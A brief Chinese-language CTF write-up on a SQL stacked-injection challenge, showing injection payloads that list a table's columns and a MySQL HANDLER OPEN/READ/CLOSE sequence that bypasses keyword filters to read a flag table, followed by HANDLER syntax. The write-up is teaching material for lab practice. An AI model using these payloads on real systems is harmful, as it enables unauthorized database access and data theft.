考点:堆叠注入,handler用法
首先使用堆叠语法可以看到包含两个表,此题是在强网杯的随便注上进行的改编,多过了一些字符,当进行fuzz测试时可以看到过滤语句


1′;show columns from FlagHere;#

到此智能看到字段中内容,强网杯中那道随便注的绕过方法全被过滤了,那题可在buu上找到复现环境,接下来介绍一种新的绕过方式handler
payload:1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

接下来我们学习以下handler的操作。
handler的语法:
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name CLOSE
使用某个表的前提必须先open,才可以进行read,最后要进行close
我们本地演示一下,进入mysql的命令行状态

首先可以看到我们的数据库中的库,表信息,接下来查看users表中的所有信息

我们使用handler对users表中数据进行查询,这里注意仔细对照前面的语法。

最后记得将其关闭。
